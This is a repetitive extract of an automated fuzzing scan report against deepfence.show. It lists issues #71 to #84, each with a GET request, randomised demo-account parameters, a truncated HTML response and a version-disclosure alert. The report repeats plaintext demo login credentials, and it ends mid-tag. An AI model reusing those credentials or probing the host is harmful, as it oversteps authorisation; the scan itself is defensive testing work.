href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.Issue Number #71\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUrfsRKdzV\nDemoUser1# 9UsWfT\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #72\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io8HIfp3YtMP4dvdS\nDemoUser1# IRrO4NUXFtwAy0Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #73\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iodhe6bou3K\nDemoUser1# ClxF7ezZXc3F\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #74\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioxhu7N1\nDemoUser1# GtSdx6s3Np\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #75\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1ZgLQYjKcu2\nDemoUser1# 7i2sNnvJ57U7H3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #76\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iom1cGMm1BWrig\nDemoUser1# yOxEtUdBfWR\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #77\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioLxg45LrQyy\nDemoUser1# AkXJe\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #78Scan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioabzYQeaOlz27\nDemoUser1# 5xOLzY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #79\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioMQwbYl5A\nDemoUser1# bK626rVqWQ\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #80\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioSvi4GFQJhxKA\nDemoUser1# kcPXu\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parametersdemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #81\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioM4BwI\nDemoUser1# 7fd1uE2pxiwX3sj\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #82\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.ioYHqcxo9iXxPjY2\nDemoUser1# 0zFKXM1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #83\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUFkxzdzkX82E\nDemoUser1# N2y9cmXnx\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #84\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioEnqcnyidOmoxhG\nDemoUser1# lqz8eAN9lN7gtN\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 